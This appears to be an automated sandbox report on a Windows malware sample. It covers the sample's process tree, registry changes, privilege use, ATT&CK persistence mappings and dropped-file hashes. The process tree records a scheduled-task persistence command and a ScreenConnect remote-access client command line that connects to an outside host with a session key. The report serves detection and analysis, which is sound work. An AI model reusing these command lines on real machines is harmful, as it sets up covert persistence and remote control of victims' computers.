\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4 msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3900 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 528 apisysDirectx.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3872 1n70A2.exe 3872 1n70A2.exe 2252 skotes.exe 2252 skotes.exe 5020 2O4054.exe 5020 2O4054.exe 5020 2O4054.exe 5020 2O4054.exe 5020 2O4054.exe 5020 2O4054.exe 2220 3Z15F.exe 2220 3Z15F.exe 1584 sQ3DZPU.exe 2556 skotes.exe 2556 skotes.exe 4904 MAl7pjE.exe 4904 MAl7pjE.exe 4904 MAl7pjE.exe 4904 MAl7pjE.exe 4904 MAl7pjE.exe 4904 MAl7pjE.exe 1592 msiexec.exe 1592 msiexec.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 3820 skotes.exe 3820 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1584 sQ3DZPU.exe Token: SeDebugPrivilege 528 apisysDirectx.exe Token: SeDebugPrivilege 2700 a1EoH8b.exe Token: SeShutdownPrivilege 1216 msiexec.exe Token: SeIncreaseQuotaPrivilege 1216 msiexec.exe Token: SeSecurityPrivilege 1592 msiexec.exe Token: SeCreateTokenPrivilege 1216 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1216 msiexec.exe Token: SeLockMemoryPrivilege 1216 msiexec.exe Token: SeIncreaseQuotaPrivilege 1216 msiexec.exe Token: SeMachineAccountPrivilege 1216 msiexec.exe Token: SeTcbPrivilege 1216 msiexec.exe Token: SeSecurityPrivilege 1216 msiexec.exe Token: SeTakeOwnershipPrivilege 1216 msiexec.exe Token: SeLoadDriverPrivilege 1216 msiexec.exe Token: SeSystemProfilePrivilege 1216 msiexec.exe Token: SeSystemtimePrivilege 1216 msiexec.exe Token: SeProfSingleProcessPrivilege 1216 msiexec.exe Token: SeIncBasePriorityPrivilege 1216 msiexec.exe Token: SeCreatePagefilePrivilege 1216 msiexec.exe Token: SeCreatePermanentPrivilege 1216 msiexec.exe Token: SeBackupPrivilege 1216 msiexec.exe Token: SeRestorePrivilege 1216 msiexec.exe Token: SeShutdownPrivilege 1216 msiexec.exe Token: SeDebugPrivilege 1216 msiexec.exe Token: SeAuditPrivilege 1216 msiexec.exe Token: SeSystemEnvironmentPrivilege 1216 msiexec.exe Token: SeChangeNotifyPrivilege 1216 msiexec.exe Token: SeRemoteShutdownPrivilege 1216 msiexec.exe Token: SeUndockPrivilege 1216 msiexec.exe Token: SeSyncAgentPrivilege 1216 msiexec.exe Token: SeEnableDelegationPrivilege 1216 msiexec.exe Token: SeManageVolumePrivilege 1216 msiexec.exe Token: SeImpersonatePrivilege 1216 msiexec.exe Token: SeCreateGlobalPrivilege 1216 msiexec.exe Token: SeCreateTokenPrivilege 1216 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1216 msiexec.exe Token: SeLockMemoryPrivilege 1216 msiexec.exe Token: SeIncreaseQuotaPrivilege 1216 msiexec.exe Token: SeMachineAccountPrivilege 1216 msiexec.exe Token: SeTcbPrivilege 1216 msiexec.exe Token: SeSecurityPrivilege 1216 msiexec.exe Token: SeTakeOwnershipPrivilege 1216 msiexec.exe Token: SeLoadDriverPrivilege 1216 msiexec.exe Token: SeSystemProfilePrivilege 1216 msiexec.exe Token: SeSystemtimePrivilege 1216 msiexec.exe Token: SeProfSingleProcessPrivilege 1216 msiexec.exe Token: SeIncBasePriorityPrivilege 1216 msiexec.exe Token: SeCreatePagefilePrivilege 1216 msiexec.exe Token: SeCreatePermanentPrivilege 1216 msiexec.exe Token: SeBackupPrivilege 1216 msiexec.exe Token: SeRestorePrivilege 1216 msiexec.exe Token: SeShutdownPrivilege 1216 msiexec.exe Token: SeDebugPrivilege 1216 msiexec.exe Token: SeAuditPrivilege 1216 msiexec.exe Token: SeSystemEnvironmentPrivilege 1216 msiexec.exe Token: SeChangeNotifyPrivilege 1216 msiexec.exe Token: SeRemoteShutdownPrivilege 1216 msiexec.exe Token: SeUndockPrivilege 1216 msiexec.exe Token: SeSyncAgentPrivilege 1216 msiexec.exe Token: SeEnableDelegationPrivilege 1216 msiexec.exe Token: SeManageVolumePrivilege 1216 msiexec.exe Token: SeImpersonatePrivilege 1216 msiexec.exe Token: SeCreateGlobalPrivilege 1216 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3872 1n70A2.exe 1216 msiexec.exe 1216 msiexec.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 3080 wrote to memory of 3052 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 3080 wrote to memory of 3052 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 3080 wrote to memory of 3052 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 3052 wrote to memory of 3872 3052 b1X18.exe 87 PID 3052 wrote to memory of 3872 3052 b1X18.exe 87 PID 3052 wrote to memory of 3872 3052 b1X18.exe 87 PID 3872 wrote to memory of 2252 3872 1n70A2.exe 88 PID 3872 wrote to memory of 2252 3872 1n70A2.exe 88 PID 3872 wrote to memory of 2252 3872 1n70A2.exe 88 PID 3052 wrote to memory of 5020 3052 b1X18.exe 89 PID 3052 wrote to memory of 5020 3052 b1X18.exe 89 PID 3052 wrote to memory of 5020 3052 b1X18.exe 89 PID 2252 wrote to memory of 1584 2252 skotes.exe 91 PID 2252 wrote to memory of 1584 2252 skotes.exe 91 PID 2252 wrote to memory of 1584 2252 skotes.exe 91 PID 3080 wrote to memory of 2220 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 93 PID 3080 wrote to memory of 2220 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 93 PID 3080 wrote to memory of 2220 3080 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 93 PID 1584 wrote to memory of 528 1584 sQ3DZPU.exe 94 PID 1584 wrote to memory of 528 1584 sQ3DZPU.exe 94 PID 1584 wrote to memory of 528 1584 sQ3DZPU.exe 94 PID 528 wrote to memory of 3900 528 apisysDirectx.exe 96 PID 528 wrote to memory of 3900 528 apisysDirectx.exe 96 PID 528 wrote to memory of 3900 528 apisysDirectx.exe 96 PID 2252 wrote to memory of 2700 2252 skotes.exe 100 PID 2252 wrote to memory of 2700 2252 skotes.exe 100 PID 2252 wrote to memory of 2700 2252 skotes.exe 100 PID 2700 wrote to memory of 1216 2700 a1EoH8b.exe 101 PID 2700 wrote to memory of 1216 2700 a1EoH8b.exe 101 PID 2700 wrote to memory of 1216 2700 a1EoH8b.exe 101 PID 1592 wrote to memory of 4112 1592 msiexec.exe 104 PID 1592 wrote to memory of 4112 1592 msiexec.exe 104 PID 1592 wrote to memory of 4112 1592 msiexec.exe 104 PID 4112 wrote to memory of 4808 4112 MsiExec.exe 105 PID 4112 wrote to memory of 4808 4112 MsiExec.exe 105 PID 4112 wrote to memory of 4808 4112 MsiExec.exe 105 PID 2252 wrote to memory of 4904 2252 skotes.exe 108 PID 2252 wrote to memory of 4904 2252 skotes.exe 108 PID 2252 wrote to memory of 4904 2252 skotes.exe 108 PID 1592 wrote to memory of 1812 1592 msiexec.exe 110 PID 1592 wrote to memory of 1812 1592 msiexec.exe 110 PID 1592 wrote to memory of 556 1592 msiexec.exe 112 PID 1592 wrote to memory of 556 1592 msiexec.exe 112 PID 1592 wrote to memory of 556 1592 msiexec.exe 112 PID 1592 wrote to memory of 2188 1592 msiexec.exe 113 PID 1592 wrote to memory of 2188 1592 msiexec.exe 113 PID 1592 wrote to memory of 2188 1592 msiexec.exe 113 PID 2404 wrote to memory of 2580 2404 ScreenConnect.ClientService.exe 115 PID 2404 wrote to memory of 2580 2404 ScreenConnect.ClientService.exe 115 PID 2404 wrote to memory of 4952 2404 ScreenConnect.ClientService.exe 116 PID 2404 wrote to memory of 4952 2404 ScreenConnect.ClientService.exe 116 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe"C:\Users\Admin\AppData\Local\Temp\2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b1X18.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b1X18.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1n70A2.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1n70A2.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 12:59 /du 23:59 /sc daily /ri 1 /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2O4054.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2O4054.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5020
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z15F.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z15F.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2556
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 31D5E53751E3D5675DC86078252E9349 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI4C9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240715078 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4808
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1812
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B3C548F2D2EBD520808D682BBF54DBDD2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:556
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EF068A30398D6DB13760F7F2FC6DD5B0 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3552
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=71208079-e773-47a5-9d56-241df27f2d02&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "92950bdf-a4ce-4319-859c-6c03990674e8" "User"2⤵
- Executes dropped EXE
PID:2580
-
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "92d566c4-22cd-4d05-a162-4acc929e3a7d" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4952
-
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2684
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3820
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD52a93b45b700be500df7101e0497b664b
SHA16793628a18f7ef69694832732c267b8ce39c9ed7
SHA256cee2e98487e524211ed465829cc3803327f79c1988489263160d1b63cc1424ad
SHA51250513d5548eab67b6ee9ffd79b7ac1a0c2b58ffd466d056e281b0d9b74b22234f23bc40e8ac44449db68092231691523915bdc7ebed1018eb77566740a0de4b2
-
Filesize
48KB
MD5d524e8e6fd04b097f0401b2b668db303
SHA19486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA25607d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5
-
Filesize
26KB
MD55cd580b22da0c33ec6730b10a6c74932
SHA10b6bded7936178d80841b289769c6ff0c8eead2d
SHA256de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787
-
Filesize
192KB
MD53724f06f3422f4e42b41e23acb39b152
SHA11220987627782d3c3397d4abf01ac3777999e01c
SHA256ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
SHA512509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll
Filesize254KB
MD55adcb5ae1a1690be69fd22bdf3c2db60
SHA109a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73
-
Filesize
588KB
MD51778204a8c3bc2b8e5e4194edbaf7135
SHA10203b65e92d2d1200dd695fe4c334955befbddd3
SHA256600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31
SHA512a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config
Filesize266B
MD5728175e20ffbceb46760bb5e1112f38b
SHA12421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA25687c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll
Filesize822KB
MD5be74ab7a848a2450a06de33d3026f59e
SHA121568dcb44df019f9faf049d6676a829323c601e
SHA2567a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA5122643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc
-
Filesize
1KB
MD5c0d2cd7ac50f669700a1c10033b3587f
SHA1ad9dcbcef8c13357ce23be47663b97e8dd713893
SHA256f4a2f6e0647e8c0dcb43982cc437ebe61c2350ca70c5fb6fc0d27d7381477b62
SHA5124fe71bd6929a78702cdcc4a942e1dd7970766831150313d0e145566496ed09c12e036dc492cb8a835bec87911d94394d9d3b677056e91837af4954870577ca1e
-
Filesize
944B
MD5dc4ecf929dfeed665ea45461ca624547
SHA182913405d7c1902e156c4e5d61dfb1b5fb54a2e0
SHA256482b0ed7d65d1776f42a0782dcc072d14f9846599544f5c79383c9c41658dd18
SHA512d21298e443f34866ac9878c23571e7577855a73581d430cccef333076ddac4fd9574dd16fa2e9a8a4e8e44c2c9ea4e89218dcd794cafc10afd45e7a6c41a1547
-
Filesize
2.1MB
MD55a599ff4879c953ae39141594df88901
SHA1afe5b05580871fab6be49c85ec54565798a14ad5
SHA25658c438da9075b2ef1492af7b651c510cb0976be7b3889404b1b77cc52836cfdd
SHA51289d6bf4e812887f10fc4da8ed5ad566eb470067627ff0e7a1026eb845ed2a0a7a330e326469f5a4ed759b0a53d966db1dcf20a95ae8a4324c8c8044ba95c9008
-
Filesize
5.4MB
MD53928a298b87622ae858b15fb8ddccd6d
SHA15fc0651a1eec249450489fb84168d2f95a23386c
SHA2569462d5c3f8d0190684c69dd26ba5c53b2948e503d98ab3453f76da465822240c
SHA5128ba733f92feb6d68676c7970f01c489582954f39e33a562c5fa3de9d77991b8322bbd1aa3e8d02e7f4fb0db44c51305fb0fba515bfd0437d2bf66029c7bd7bbd
-
Filesize
2.0MB
MD5899ef8aea4629d28c1d995e81dba972b
SHA1aab2a3ef789c537ea98603635a6f5d3ca6727f26
SHA256dd8f948bce030a1b5003fc1be4c3698bb86305b01517f66047bf8f53f5277dee
SHA512fb5edd663e4004f91edc1e7d74afb5bca083d8bf5a6870827e22620456d0b71c86eb8ac084b546c12b5bc0def6071fa1e8ce7e03888a525dad87ba33d32d94a4
-
Filesize
1.7MB
MD55b9a5108db9f44cb9c03e6a0053fe36f
SHA10e86891e4865698bb961ed52a0d3ab3e9cdceebf
SHA256818a5052ebc13d74a00954d0abd2520b0f0a23c13d6d6f58955d74c386fb07ac
SHA512f34994634c605302d752b1be27479c55e784f4d1951bcb2af7e97b2a4b981faff0ad96abd0e45d4601adffae24b8428780c04354729412c6cdeddcc9cdcf5dcf
-
Filesize
3.7MB
MD5a73437c46c1b4e55e77212c0b668a2ab
SHA1c756603f06d4f685465c364abb55e70c47e30b19
SHA25691cf5dad47c901a9757afdcf668e6f680eb9a78fbc1e4f7bb23b756f28467d2c
SHA512228e48b80b4d138c39fee00ffeb4772c0b45fe4e726ba69abfc41e5faa8cca66b1425298b865ef57d34118f4ee4af65b37acb104a77dc899cd5278273d399eb3
-
Filesize
2.0MB
MD56d2823ba3507697ffa339fcfbbf50bb4
SHA1dd219c54f269a83ded50f04988316092ecab3d94
SHA2568f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe
SHA5128264f498304e565f1ef4f1331954fbe8c259d73471b9da8403bda3e9a7fb2dc5ffa794368d0d2b3cace3ddcbbf784b70d4d656ea761777689401935930b7d698
-
Filesize
1.8MB
MD5d6f5b37a3b1dbe281b72f3a03159dcab
SHA11aeb76a6d1e36e675f3ace4d2fa29c4d60a1ed5a
SHA256e420d3e4bf4e9885975ef5bebb188c31571384cdc2ad61b9cad12435b66f1d31
SHA5129468ecec37a60371c434bd9d1c6eb073839e72aa870b3cbcd9d42773173ae3a8102ca379d5e8fb5d41c795c3f6659ca9298211b3db87b0cbf103d7e7231e0804
-
Filesize
1.0MB
MD58a8767f589ea2f2c7496b63d8ccc2552
SHA1cc5de8dd18e7117d8f2520a51edb1d165cae64b0
SHA2560918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b
SHA512518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4
-
Filesize
172KB
MD55ef88919012e4a3d8a1e2955dc8c8d81
SHA1c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA2563e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA5124544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684
-
Filesize
536KB
MD514e7489ffebbb5a2ea500f796d881ad9
